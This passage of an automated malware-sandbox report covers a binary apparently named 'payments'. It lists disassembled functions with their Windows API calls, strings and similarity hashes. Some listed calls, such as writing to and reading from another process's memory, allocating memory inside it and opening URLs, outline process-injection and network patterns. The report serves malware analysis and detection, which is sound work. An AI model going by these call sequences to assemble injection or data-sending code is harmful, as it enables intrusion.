  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CB7F65
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CB7F78
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CB7F8B
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CB7F9E
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CB7FB1
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CB7FC4
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00CB7FD7
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CB7FEA
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CB7FFD
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CB8010
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CB8023
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CB8036
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CB8049
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CB805C
  • Part of subcall function 00CB123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00CB806F
• __mtinitlocks.LIBCMT ref: 00CB7B4C
  • Part of subcall function 00CB7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00D4AC68,00000FA0,?,?,00CB7B51,00CB5E77,00D46C70,00000014), ref: 00CB7E41
• __mtterm.LIBCMT ref: 00CB7B55
  • Part of subcall function 00CB7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00CB7B5A,00CB5E77,00D46C70,00000014), ref: 00CB7D3F
  • Part of subcall function 00CB7BBD: _free.LIBCMT ref: 00CB7D46
  • Part of subcall function 00CB7BBD: DeleteCriticalSection.KERNEL32(00D4AC68,?,?,00CB7B5A,00CB5E77,00D46C70,00000014), ref: 00CB7D68
• __calloc_crt.LIBCMT ref: 00CB7B7A
• GetCurrentThreadId.KERNEL32 ref: 00CB7BA3
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
• Opcode ID: f8712158ad0929c1749047442a620e5eb6b499e6b07a8a3d7b0334bf23334009
• Instruction ID: 5ad71bd07a19fc4d5ac1c6b79b5d1199fb7d50ec50fbd762789c43783d8f92bd
• Opcode Fuzzy Hash: f8712158ad0929c1749047442a620e5eb6b499e6b07a8a3d7b0334bf23334009
• Instruction Fuzzy Hash: 97F0903254D3521FEA287B787C06ACB2684DF82730F2007AAFC60D52D2FF21894179B1
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C9281D
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00C92825
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C92830
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C9283B
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00C92843
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00C9284B
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: c0625ba218d1aee1b08272e4f6d2f2b3d7f03d4a52497dc73cd65ed75f604c1f
• Instruction ID: bf936b5388ff3aa55cebe3540984dac9781080a1dadc7887c5cdb27ef3c675d1
• Opcode Fuzzy Hash: c0625ba218d1aee1b08272e4f6d2f2b3d7f03d4a52497dc73cd65ed75f604c1f
• Instruction Fuzzy Hash: 2A0144B0902B5ABDE3008F6A8C85A52FFA8FF19354F00411BA15C87A42C7B5A864CBE5
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 1423608774-0
• Opcode ID: b6580aff6a35ad88ebca3573e7c980cd30d6fbfe04c20236ae5c6407aeb6ee8e
• Instruction ID: 89d8f5135d25359ce01c5876d7a8dea99764500809d7c84156b2393669ff5489
• Opcode Fuzzy Hash: b6580aff6a35ad88ebca3573e7c980cd30d6fbfe04c20236ae5c6407aeb6ee8e
• Instruction Fuzzy Hash: E601A937201321BBD7152B54EC48EEB776AFF88701704452AF617D22A0DF749D01EB60
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CD7C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CD7C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00CD7C2C
                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD7C3B
                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD7C45
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD7C4C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 839392675-0
                                                                                                                          • Opcode ID: 955b75b8283027f1bd441755661c4adbc5f584481e8944c3ce3414b68b506cfe
                                                                                                                          • Instruction ID: 892baab00e5a669ed571d5cdee70a5413a30e4cc2e6f78c5b2f134fe098ba478
                                                                                                                          • Opcode Fuzzy Hash: 955b75b8283027f1bd441755661c4adbc5f584481e8944c3ce3414b68b506cfe
                                                                                                                          • Instruction Fuzzy Hash: 07F03A72241258BBE7215B929C0EEEF7F7DEFC6B11F004019FA01D1251EBA45A82C6B5
                                                                                                                          APIs
                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00CD9A33
                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A44
                                                                                                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A51
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A5E
                                                                                                                            • Part of subcall function 00CD93D1: CloseHandle.KERNEL32(?,?,00CD9A6B,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD93DB
                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD9A71
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,00D05DEE,?,?,?,?,?,00C9ED63), ref: 00CD9A78
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3495660284-0
                                                                                                                          • Opcode ID: 9289e6403c0e937ca6301493b97ed39fde994712ff5701dde0968546a8e273a9
                                                                                                                          • Instruction ID: 79ae816c9cc3920b0ba16a7d4abd0f97ff3446bd97be13eb51f44fc679153385
                                                                                                                          • Opcode Fuzzy Hash: 9289e6403c0e937ca6301493b97ed39fde994712ff5701dde0968546a8e273a9
                                                                                                                          • Instruction Fuzzy Hash: 71F0BE36141311BBD3112BA4EC88DEA773AFF84301B044022F613D22A0CF749902EB60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAF4EA: std::exception::exception.LIBCMT ref: 00CAF51E
                                                                                                                            • Part of subcall function 00CAF4EA: __CxxThrowException@8.LIBCMT ref: 00CAF533
                                                                                                                          • __swprintf.LIBCMT ref: 00C91EA6
                                                                                                                          Strings
                                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C91D49
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                          • API String ID: 2125237772-557222456
                                                                                                                          • Opcode ID: 2249c2cd84c9b1795f9d3d7c74c5c3d47b5afd8feca88074e0aafdda0fe3c0ad
                                                                                                                          • Instruction ID: 643349254a96e3f48d95f648d4dd74f7d9116ad30d40b4f39390181d71ae8fc9
                                                                                                                          • Opcode Fuzzy Hash: 2249c2cd84c9b1795f9d3d7c74c5c3d47b5afd8feca88074e0aafdda0fe3c0ad
                                                                                                                          • Instruction Fuzzy Hash: A4917C71114202AFCB24EF64C89AD6EB7A4FF85700F04496DF895972A1DB30EE05DBA2
                                                                                                                          APIs
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CEB006
                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00CEB115
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CEB298
                                                                                                                            • Part of subcall function 00CD9DC5: VariantInit.OLEAUT32(00000000), ref: 00CD9E05
                                                                                                                            • Part of subcall function 00CD9DC5: VariantCopy.OLEAUT32(?,?), ref: 00CD9E0E
                                                                                                                            • Part of subcall function 00CD9DC5: VariantClear.OLEAUT32(?), ref: 00CD9E1A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                                          • Opcode ID: fe2e14ad425b0c7e3deb398c6f718ad1c3a17bf96b383657de5652fabcbb16b7
                                                                                                                          • Instruction ID: 16f23315fdf054b9f84d4c87a64cedbc2981e112fccb596efb419a66f8ac5249
                                                                                                                          • Opcode Fuzzy Hash: fe2e14ad425b0c7e3deb398c6f718ad1c3a17bf96b383657de5652fabcbb16b7
                                                                                                                          • Instruction Fuzzy Hash: 4A9178716083419FCB10DF29C48596BBBE4EF89714F04886EF99A9B362DB31ED05CB52
                                                                                                                          APIs
                                                                                                                          • GetWindowRect.USER32(00E965A8,?), ref: 00CFC544
                                                                                                                          • ScreenToClient.USER32(?,00000002), ref: 00CFC574
                                                                                                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CFC5DA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3880355969-2594219639
                                                                                                                          • Opcode ID: 71533dfd62a601d899be8404980b56e0317a2ea90bc21dd8b75effb6496390cb
                                                                                                                          • Instruction ID: ac040b0bb9dfd43f50f995c48c497a54b4208862a724c61f749be6800064d578
                                                                                                                          • Opcode Fuzzy Hash: 71533dfd62a601d899be8404980b56e0317a2ea90bc21dd8b75effb6496390cb
                                                                                                                          • Instruction Fuzzy Hash: 56512F75A0020DAFCF50DF68C9C0ABE77B6AB55320F208659F965DB290D730EE41DB51
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCC462
                                                                                                                          • __itow.LIBCMT ref: 00CCC49C
                                                                                                                            • Part of subcall function 00CCC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00CCC753
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00CCC505
                                                                                                                          • __itow.LIBCMT ref: 00CCC55A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$__itow
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3379773720-2594219639
                                                                                                                          • Opcode ID: 64852a47bfc57020f621ad91e95c69a0bbc3f4b370818bc9a1d74dfe4f88c02c
                                                                                                                          • Instruction ID: 989672ecc89ca40c0f712a074a1822cf38740f453b822405da0cb586e3d4bc01
                                                                                                                          • Opcode Fuzzy Hash: 64852a47bfc57020f621ad91e95c69a0bbc3f4b370818bc9a1d74dfe4f88c02c
                                                                                                                          • Instruction Fuzzy Hash: 8141A571A00608AFDF25DF54C896FFE7BB9AF49700F00405DFA19A7281DB709A49DBA1
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC08,?,?,00000034,00000800,?,00000034), ref: 00CD4335
                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00CCC1D3
                                                                                                                            • Part of subcall function 00CD42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00CD4300
                                                                                                                            • Part of subcall function 00CD422F: GetWindowThreadProcessId.USER32(?,?), ref: 00CD425A
                                                                                                                            • Part of subcall function 00CD422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD426A
                                                                                                                            • Part of subcall function 00CD422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD4280
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCC240
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CCC28D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                          • String ID: @$@U=u
                                                                                                                          • API String ID: 4150878124-826235744
                                                                                                                          • Opcode ID: 5f1b51c3a65a7c464a20e0e02114cae7404eb4876d726b32627fdbe4c5914f99
                                                                                                                          • Instruction ID: 5da789d2958ffaa52ac953f7670ffc852191ad07e2102d80db3b73fee4962099
                                                                                                                          • Opcode Fuzzy Hash: 5f1b51c3a65a7c464a20e0e02114cae7404eb4876d726b32627fdbe4c5914f99
                                                                                                                          • Instruction Fuzzy Hash: 39413B76900218BFDB15DFA4CC81EEEB7B8AB09300F044099FA55B7291DB716E45DB61
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CD027B
                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CD02B1
                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CD02C2
                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD0344
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                          • String ID: DllGetClassObject
                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                          • Opcode ID: 13432ec821c3735b7ec286c0dfcac8575d0a24888406abf88fd72f6c8c8e4fb5
                                                                                                                          • Instruction ID: 38f106a9df1955557662aec00b55202793956ce843ece77504d5870038dbd6fa
                                                                                                                          • Opcode Fuzzy Hash: 13432ec821c3735b7ec286c0dfcac8575d0a24888406abf88fd72f6c8c8e4fb5
                                                                                                                          • Instruction Fuzzy Hash: 36413071600204EFDB05CF59C885BAA7BB9EF44314F2480AEAE09DF356D7B1DA45CBA0
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD5075
                                                                                                                          • GetMenuItemInfoW.USER32 ref: 00CD5091
                                                                                                                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00CD50D7
                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D51708,00000000), ref: 00CD5120
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                                          • Opcode ID: 66430067abc7a90cb7ebfd2a1bcffc65976e1d54bc97d26da9438482a34ec936
                                                                                                                          • Instruction ID: 4f1e6264c3f0e97c69ed335fbf0b2e4fde8fcebda6f2751fde172d608a08fb89
                                                                                                                          • Opcode Fuzzy Hash: 66430067abc7a90cb7ebfd2a1bcffc65976e1d54bc97d26da9438482a34ec936
                                                                                                                          • Instruction Fuzzy Hash: 37419171204701AFD720DF28D885B6EB7E5AF85314F144A5FFAA697391DB30E900CB62
                                                                                                                          APIs
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CFB5D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InvalidateRect
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 634782764-2594219639
                                                                                                                          • Opcode ID: 51c51a2cd590e00a3678f722274854e3be46f7041d9a50d4d9083c7af8237e63
                                                                                                                          • Instruction ID: 1c3b8dfcec38c61cc388e0b088c5f2847a28e1222df267da58a3f7ac0ad918a6
                                                                                                                          • Opcode Fuzzy Hash: 51c51a2cd590e00a3678f722274854e3be46f7041d9a50d4d9083c7af8237e63
                                                                                                                          • Instruction Fuzzy Hash: FB31BE7460120CBBEFA88F19CC89FF87766AB05350F648501FB61D62E1CB34AE409B63
                                                                                                                          APIs
                                                                                                                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00CF0587
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharLower
                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                          • API String ID: 2358735015-567219261
                                                                                                                          • Opcode ID: f69f575837f7e7af351e3e2bfd6a60c722655efa9ff7eefed192e4f6c569ed8e
                                                                                                                          • Instruction ID: 901f36b33797b898ed0c5c31a2c8fb940ae3f18970d86795b5519f5c1ca6a6c0
                                                                                                                          • Opcode Fuzzy Hash: f69f575837f7e7af351e3e2bfd6a60c722655efa9ff7eefed192e4f6c569ed8e
                                                                                                                          • Instruction Fuzzy Hash: 7131CF3050021AAFCF00EF54C8419FEB3B4FF45324B208629F936A76D2DB71AA15CB90
                                                                                                                          APIs
                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4401
                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE4427
                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CE4457
                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00CE449E
                                                                                                                            • Part of subcall function 00CE5052: GetLastError.KERNEL32(?,?,00CE43CC,00000000,00000000,00000001), ref: 00CE5067
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
